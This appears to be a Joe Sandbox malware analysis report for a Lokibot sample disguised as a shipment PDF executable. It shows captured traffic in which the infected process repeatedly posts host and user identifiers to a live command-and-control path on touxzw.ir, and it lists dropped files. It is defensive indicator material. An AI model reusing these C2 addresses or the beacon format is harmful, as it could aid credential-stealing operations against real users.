Feb 24, 2025 08:41:00.308063030 CET	840	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:41:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yqsU90AOHMWWU2VY72Z51D7wd%2FIgMb6gA5dSpFfsQapetzvBxXHQip7jsawuVWBUx5VEGp4T573qC%2FpOMKCuT8gq9wxUdNwWWXpUYXcTltRrwfyZ3QMpHzlOiss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf8aac694367-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:41:00.493115902 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:41:00.499202967 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:41:01.267452955 CET	850	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:41:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uOZvtjTWrn8g%2Bfl%2B9Bb9sF1yTxjQrZEGewbwE2r6VA4ybHU%2BPXPBYausUCPLq%2BpdhHTz%2F20Nw%2FVM2dhcsFZpAos%2FXtnqKe2MsiQljBQTeoyp41HnZHsc5ZMCiRQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf90aa0cefa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:41:01.465842009 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:41:01.471055984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:41:02.224548101 CET	844	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:41:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KfT8ciDvJO7crH%2BNHZ05kn6HvhMkfEC58JZntRzlqSgkNQnzyJa0VbKgdzfOT6gZROr%2Fs%2FdZr0neGIZzeheY7XV9Iu2xKQ2LN%2BXfsiLsL3ZLjtU0CtIkVGn2D0M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf96ab15c42a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1619&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:41:02.433902979 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:41:02.439270973 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
Feb 24, 2025 08:41:03.173329115 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:41:03 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WccqH6ELveBDic6U3LZGJYGFfB%2BTMWpeZUGyD8qaFST47u0ANOf213WN81yiw5PXikdgxSfzxLORQ9VV2bxqR3JxEsLi47cyNEOs61Ns5%2FOnfc6Hms7dVNTY%2F4c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dcf9cceb243e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1594&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:41:03.355752945 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:41:03.364814997 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipment Delivery No DE0093002-PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Roca

C:\Users\user\AppData\Local\Temp\aut9D1D.tmp

C:\Users\user\AppData\Local\Temp\aut9D5C.tmp

C:\Users\user\AppData\Local\Temp\autA0D6.tmp

C:\Users\user\AppData\Local\Temp\autA1A2.tmp

C:\Users\user\AppData\Local\Temp\scroll

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
Shipment Delivery No DE0093002-PDF.exe